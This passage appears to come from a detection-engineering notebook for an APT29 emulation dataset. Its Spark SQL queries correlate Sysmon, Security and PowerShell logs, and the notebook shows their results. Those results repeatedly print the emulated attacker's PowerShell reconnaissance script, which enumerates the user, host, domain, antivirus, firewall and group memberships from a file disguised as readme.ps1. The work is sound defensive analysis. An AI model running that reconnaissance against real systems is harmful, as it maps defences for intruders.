-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.8. Security Software Discovery

Procedure: Enumerated firewall software using PowerShell

Criteria: powershell.exe executing Get-WmiObject … -Class FireWallProduct

Detection Type: Telemetry (Correlated)

Query ID:9F924458-73AD-42C8-B98E-0CB4B4355B9B

# 4.C.8 Security Software Discovery (firewall), Sysmon correlation
# (Query ID 9F924458-73AD-42C8-B98E-0CB4B4355B9B).
#
# Identical process-tree walk to the AntiVirusProduct query over Sysmon EventID 1
# (sdclt.exe -> control.exe -> High-integrity child -> powershell.exe); only the
# final ScriptBlockText filter differs: "-class firewallproduct".
#
# Coverage caveat: requires the sdclt.exe -> control.exe lineage; the same
# WMI enumeration from another parent chain is not matched.
# NOTE(review): d.Image is matched with a case-sensitive LIKE and no LOWER(),
# unlike the Image/ParentImage filters in subquery b.
# `spark` is not defined in this file; it is assumed to be the notebook's SparkSession.
firewall_discovery_sysmon_sql = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%-class firewallproduct%"

'''
df = spark.sql(firewall_discovery_sysmon_sql)
# Vertical layout keeps the multi-line script block readable; truncate=False
# shows the whole Message.
df.show(100, truncate=False, vertical=True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:B7549913-AF53-4F9A-9C3F-4106578EA5F2

# 4.C.8 Security Software Discovery (firewall), Windows Security (4688) correlation
# (Query ID B7549913-AF53-4F9A-9C3F-4106578EA5F2).
#
# Same 4688 process-tree walk as the AntiVirusProduct Security query
# (sdclt.exe -> control.exe -> High/full-token child -> powershell.exe), with the
# "0x" hex NewProcessId normalized against LOWER(hex(ExecutionProcessID)) for the
# join to the 4104 script block. Only the ScriptBlockText filter differs:
# "-class firewallproduct".
#
# Coverage caveat: anchored on the sdclt.exe -> control.exe lineage.
# NOTE(review): d.NewProcessName is matched without LOWER(), unlike the
# NewProcessName/ParentProcessName filters in subquery b; LIKE is case-sensitive.
# `spark` is not defined in this file; it is assumed to be the notebook's SparkSession.
firewall_discovery_security_sql = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%-class firewallproduct%"

'''
df = spark.sql(firewall_discovery_security_sql)
# Vertical layout keeps the multi-line script block readable; truncate=False
# shows the whole Message.
df.show(100, truncate=False, vertical=True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.9. Permission Groups Discovery

Procedure: Enumerated user’s domain group membership via the NetUserGetGroups API

Criteria: powershell.exe executing the NetUserGetGroups API

Detection Type: Technique (Alert)

Query ID:FA458669-1C94-4150-AFFC-A3236FC6B275

# 4.C.9 Permission Groups Discovery, technique-level alert
# (Query ID FA458669-1C94-4150-AFFC-A3236FC6B275).
#
# Subquery a selects Security EventID 4661 (handle requested) on a SAM_DOMAIN
# object where the Message lists GetLocalGroupMembership, the AccessMask is
# 0x20094, and the subject is not a machine account (SubjectUserName NOT LIKE '%$').
# The outer query joins those handle requests to the network logon that produced
# the session (EventID 4624, LogonType 3) on o.TargetLogonId = a.SubjectLogonId,
# which is what supplies TargetUserName and IpAddress in the result.
# The unqualified `lower(Channel)` in the outer WHERE resolves to o.Channel,
# since subquery a projects only Message, EventTime and SubjectLogonId.
#
# `spark` is not defined in this file; it is assumed to be the notebook's SparkSession.
netusergetgroups_sam_access_sql = '''
SELECT a.EventTime, o.TargetUserName, o.IpAddress, a.Message
FROM apt29Host o
INNER JOIN (
    SELECT Message, EventTime, SubjectLogonId
    FROM apt29Host
    WHERE lower(Channel) = "security"
        AND EventID = 4661
        AND ObjectType = "SAM_DOMAIN"
        AND SubjectUserName NOT LIKE '%$'
        AND AccessMask = '0x20094'
        AND LOWER(Message) LIKE '%getlocalgroupmembership%'
    ) a
ON o.TargetLogonId = a.SubjectLogonId
WHERE lower(Channel) = "security" 
        AND o.EventID = 4624
        AND o.LogonType = 3

'''
df = spark.sql(netusergetgroups_sam_access_sql)
# Vertical layout keeps the multi-line 4661 Message readable; truncate=False
# shows it in full.
df.show(100, truncate=False, vertical=True)
-RECORD 0--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 EventTime      | 2020-05-01 23:04:04                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
 TargetUserName | pbeesly                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            
 IpAddress      | 10.0.1.4                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
 Message        | A handle to an object was requested.

Subject :
	Security ID:		S-1-5-21-1830255721-3727074217-2423397540-1107
	Account Name:		pbeesly
	Account Domain:		DMEVALS
	Logon ID:		0x5DD594

Object:
	Object Server:	Security Account Manager
	Object Type:	SAM_DOMAIN
	Object Name:	DC=dmevals,DC=local
	Handle ID:	0x1fccecf7240

Process Information:
	Process ID:	0x2c0
	Process Name:	C:\Windows\System32\lsass.exe

Access Request Information:
	Transaction ID:	{00000000-0000-0000-0000-000000000000}
	Accesses:	READ_CONTROL
				ReadOtherParameters
				CreateUser
				GetLocalGroupMembership
				
	Access Reasons:		-
	Access Mask:	0x20094
	Privileges Used for Access Check:	-
	Properties:	---
	{19195a5a-6da0-11d0-afd3-00c04fd930c9}
READ_CONTROL
ReadOtherParameters
CreateUser
GetLocalGroupMembership
		{c7407360-20bf-11d0-a768-00aa006e0529}
			{bf9679a4-0de6-11d0-a285-00aa003049e2}
			{bf9679a5-0de6-11d0-a285-00aa003049e2}
			{bf9679a6-0de6-11d0-a285-00aa003049e2}
			{bf9679bb-0de6-11d0-a285-00aa003049e2}
			{bf9679c2-0de6-11d0-a285-00aa003049e2}
			{bf9679c3-0de6-11d0-a285-00aa003049e2}
			{bf967a09-0de6-11d0-a285-00aa003049e2}
			{bf967a0b-0de6-11d0-a285-00aa003049e2}
		{b8119fd0-04f6-4762-ab7a-4986c76b3f9a}
			{bf967a34-0de6-11d0-a285-00aa003049e2}
			{bf967a33-0de6-11d0-a285-00aa003049e2}
			{bf9679c5-0de6-11d0-a285-00aa003049e2}
			{bf967a61-0de6-11d0-a285-00aa003049e2}
			{bf967977-0de6-11d0-a285-00aa003049e2}
			{bf96795e-0de6-11d0-a285-00aa003049e2}
			{bf9679ea-0de6-11d0-a285-00aa003049e2}
		{ab721a52-1e2f-11d0-9819-00aa0040529b}

	Restricted SID Count:	0 

Detection Type: Telemetry (Correlated)

Query ID:11827B7C-8010-443C-9116-500289E0ED57

# 4.C.9 Permission Groups Discovery, Sysmon correlation
# (Query ID 11827B7C-8010-443C-9116-500289E0ED57).
#
# Same Sysmon EventID 1 process-tree walk as the security-software queries
# (sdclt.exe -> control.exe -> High-integrity child -> powershell.exe), ending in
# the 4104 script block whose text contains "netusergetgroups".
#
# Coverage caveat: anchored on the sdclt.exe -> control.exe lineage.
# NOTE(review): d.Image is matched with a case-sensitive LIKE and no LOWER(),
# unlike the Image/ParentImage filters in subquery b.
# `spark` is not defined in this file; it is assumed to be the notebook's SparkSession.
netusergetgroups_sysmon_sql = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%netusergetgroups%"

'''
df = spark.sql(netusergetgroups_sysmon_sql)
# Vertical layout keeps the multi-line script block readable; truncate=False
# shows the whole Message.
df.show(100, truncate=False, vertical=True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:52E7DFEA-05BC-4B81-BFE9-DE6085FA8228

# 4.C.9 Permission Groups Discovery, Windows Security (4688) correlation
# (Query ID 52E7DFEA-05BC-4B81-BFE9-DE6085FA8228).
#
# Same 4688 process-tree walk as the security-software Security queries
# (sdclt.exe -> control.exe -> High/full-token child -> powershell.exe), with the
# "0x" hex NewProcessId normalized against LOWER(hex(ExecutionProcessID)) for the
# join to the 4104 script block containing "netusergetgroups".
#
# Coverage caveat: anchored on the sdclt.exe -> control.exe lineage.
# NOTE(review): d.NewProcessName is matched without LOWER(), unlike the
# NewProcessName/ParentProcessName filters in subquery b; LIKE is case-sensitive.
# `spark` is not defined in this file; it is assumed to be the notebook's SparkSession.
netusergetgroups_security_sql = '''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT split(d.NewProcessId, '0x')[1] as NewProcessId
  FROM apt29Host d
  INNER JOIN(
    SELECT a.ProcessId, a.NewProcessId
    FROM apt29Host a
    INNER JOIN (
      SELECT NewProcessId
      FROM apt29Host
      WHERE LOWER(Channel) = "security"
          AND EventID = 4688
          AND LOWER(NewProcessName) LIKE "%control.exe"
          AND LOWER(ParentProcessName) LIKE "%sdclt.exe"
    ) b
    ON a.ProcessId = b.NewProcessId
    WHERE LOWER(a.Channel) = "security"
      AND a.EventID = 4688
      AND a.MandatoryLabel = "S-1-16-12288"
      AND a.TokenElevationType = "%%1937"
  ) c
  ON d.ProcessId = c.NewProcessId
  WHERE LOWER(d.Channel) = "security"
    AND d.EventID = 4688
    AND d.NewProcessName LIKE '%powershell.exe'
) e
ON LOWER(hex(f.ExecutionProcessID)) = e.NewProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%netusergetgroups%"

'''
df = spark.sql(netusergetgroups_security_sql)
# Vertical layout keeps the multi-line script block readable; truncate=False
# shows the whole Message.
df.show(100, truncate=False, vertical=True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

4.C.10. Execution through API

Procedure: Executed API call by reflectively loading Netapi32.dll

Criteria: The NetUserGetGroups API function loaded into powershell.exe from Netapi32.dll

Detection Type:Telemetry(Correlated)

Query ID:0B50643F-98FA-4F4A-8E22-9257D85AD7C5

# 4.C.10 — Sysmon-only correlation for the Netapi32.dll load.
# Walks the same process chain the earlier queries in this section use:
#   b: Sysmon EID 1, control.exe whose parent image is sdclt.exe
#   a: Sysmon EID 1, children of b that run with IntegrityLevel "High"
#   d: Sysmon EID 1, powershell.exe children of a
#   f: Sysmon EID 7 (image load) emitted by that powershell.exe process
#      where the loaded image ends in netapi32.dll
# Every hop joins on ProcessGuid, which Sysmon assigns per process instance,
# so the chain is not vulnerable to PID reuse the way a PID-keyed join is.
# Scope note: EID 7 only records that the module was mapped; it cannot show
# which export (NetUserGetGroups per the Criteria) was later called, and the
# DLL itself is a signed Microsoft binary (see Signed/Signature in the
# output). The signal comes from the calling process chain, not the module.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
    SELECT d.ProcessGuid
    FROM apt29Host d
    INNER JOIN (
      SELECT a.ProcessGuid, a.ParentProcessGuid
      FROM apt29Host a
      INNER JOIN (
        SELECT ProcessGuid
        FROM apt29Host
        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
            AND EventID = 1
            AND LOWER(Image) LIKE "%control.exe"
            AND LOWER(ParentImage) LIKE "%sdclt.exe"
      ) b
      ON a.ParentProcessGuid = b.ProcessGuid
      WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
        AND a.EventID = 1
        AND a.IntegrityLevel = "High"
    ) c
    ON d.ParentProcessGuid= c.ProcessGuid
    WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND d.EventID = 1
      AND d.Image LIKE '%powershell.exe'
) e
ON f.ProcessGuid = e.ProcessGuid
WHERE f.Channel = "Microsoft-Windows-Sysmon/Operational"
AND f.EventID = 7
AND LOWER(f.ImageLoaded) LIKE "%netapi32.dll"

'''
)
# Print up to 100 matches, untruncated, one field per line (only Message is selected).
df.show(100,truncate = False, vertical = True)
-RECORD 0----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Image loaded:
RuleName: -
UtcTime: 2020-05-02 03:04:04.361
ProcessGuid: {47ab858c-e23d-5eac-c603-000000000400}
ProcessId: 3876
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ImageLoaded: C:\Windows\System32\netapi32.dll
FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
Description: Net Win32 API DLL
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: NetApi32.DLL
Hashes: SHA1=7DFDD188B30162DAA87FDD3E5B7A55C80CD839F1,MD5=86A9DF3FA9D5FCAC8EF57601FCCD78F9,SHA256=F8CDA38FD3FF371E772875EA657A37662321EBB7AD8D6978DBCCCA7FC6DB64F1,IMPHASH=7D4E1695394CF47BD397AFD45A40E55D
Signed: true
Signature: Microsoft Windows
SignatureStatus: Valid 

4.C.11. Permission Groups Discovery

Procedure: Enumerated user’s local group membership via the NetUserGetLocalGroups API

Criteria: powershell.exe executing the NetUserGetLocalGroups API

Detection Type:Telemetry(Correlated)

Query ID:1CD16ED8-C812-40B1-B968-F0DABFC79DDF

# 4.C.11 — Sysmon process chain joined to PowerShell Script Block Logging.
#   b/a/d: Sysmon EID 1 chain sdclt.exe -> control.exe -> high-integrity
#          child -> powershell.exe (joined on ProcessGuid)
#   f:     Microsoft-Windows-PowerShell/Operational EID 4104 (script block
#          text) whose ScriptBlockText contains "netusergetlocalgroups"
# The last hop has to join on the numeric PID (Sysmon ProcessId vs.
# PowerShell ExecutionProcessID) because the PowerShell log carries no
# ProcessGuid; a PID-keyed join can cross-link an unrelated process if the
# PID is reused inside the data window, so keep the window tight.
# Scope note: the LIKE is a substring match on logged script source. The
# record returned is the Invoke-Discovery function, which merely calls an
# Invoke-NetUserGetLocalGroups wrapper; the wrapper body that actually
# reaches the API is not visible here — verify it is logged separately.
df = spark.sql(
'''
SELECT Message
FROM apt29Host f
INNER JOIN (
  SELECT d.ProcessId
  FROM apt29Host d
  INNER JOIN (
    SELECT a.ProcessGuid, a.ParentProcessGuid
    FROM apt29Host a
    INNER JOIN (
      SELECT ProcessGuid
      FROM apt29Host
      WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
          AND EventID = 1
          AND LOWER(Image) LIKE "%control.exe"
          AND LOWER(ParentImage) LIKE "%sdclt.exe"
    ) b
    ON a.ParentProcessGuid = b.ProcessGuid
    WHERE a.Channel = "Microsoft-Windows-Sysmon/Operational"
      AND a.EventID = 1
      AND a.IntegrityLevel = "High"
  ) c
  ON d.ParentProcessGuid= c.ProcessGuid
  WHERE d.Channel = "Microsoft-Windows-Sysmon/Operational"
    AND d.EventID = 1
    AND d.Image LIKE '%powershell.exe'
) e
ON f.ExecutionProcessID = e.ProcessId
WHERE f.Channel = "Microsoft-Windows-PowerShell/Operational"
  AND f.EventID = 4104
  AND LOWER(f.ScriptBlockText) LIKE "%netusergetlocalgroups%"

'''
)
# Print up to 100 matches, untruncated, one field per line.
df.show(100,truncate = False, vertical = True)
-RECORD 0-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Message | Creating Scriptblock text (1 of 1):
function Invoke-Discovery {
    $DiscoveryInfo =@()
    $CurrentDir = Get-Location

    $DiscoveryInfo += [PSCustomObject]@{
                CurrentDirectory = $CurrentDir
                TempDirectory = $env:TEMP
                UserName = $env:USERNAME
                ComputerName = $env:COMPUTERNAME
                UserDomain = $env:USERDOMAIN
                CurrentPID = $PID
            }

    $DiscoveryInfo | Format-List
    
    $NameSpace = Get-WmiObject -Namespace "root" -Class "__Namespace" | Select Name | Out-String -Stream | Select-String "SecurityCenter"
    foreach ($SecurityCenter in $NameSpace) { 
        Get-WmiObject -Namespace "root\$SecurityCenter" -Class AntiVirusProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List
        WmiObject -Namespace "root\$SecurityCenter" -Class FireWallProduct -ErrorAction SilentlyContinue | Select DisplayName, InstanceGuid, PathToSignedProductExe, PathToSignedReportingExe, ProductState, Timestamp | Format-List 
    } 

    Gwmi Win32_OperatingSystem | Select Name, OSArchitecture, CSName, BuildNumber, Version | Format-List
    Invoke-NetUserGetGroups
    Invoke-NetUserGetLocalGroups
}

ScriptBlock ID: 70878299-2ee1-4a5d-869f-124b349aee1d
Path: C:\Program Files\SysinternalsSuite\readme.ps1 

Query ID:F0AC46E2-63EA-4C8E-AF39-6631444451E5

# 4.C.11 — Same correlation using the Windows Security log (EID 4688) instead
# of Sysmon, for hosts without Sysmon.
#   b: 4688, control.exe created by sdclt.exe
#   a: 4688, children of b with MandatoryLabel S-1-16-12288 (High integrity
#      SID) and TokenElevationType %%1937 (TokenElevationTypeFull, i.e. an
#      elevated token)
#   d: 4688, powershell.exe children of a
#   f: PowerShell EID 4104 whose ScriptBlockText contains "netusergetlocalgroups"
# PID normalisation: 4688 logs NewProcessId as a 0x-prefixed hex string
# while 4104 ExecutionProcessID is numeric, so the query strips the "0x"
# with split(...)[1] on one side and applies LOWER(hex(...)) on the other
# before comparing. Every hop is PID-keyed (4688 has no ProcessGuid), so
# PID reuse inside the window can produce false joins; the Sysmon variant
# of this query is the more robust of the two where both logs exist.
df = spark.sql(
'''
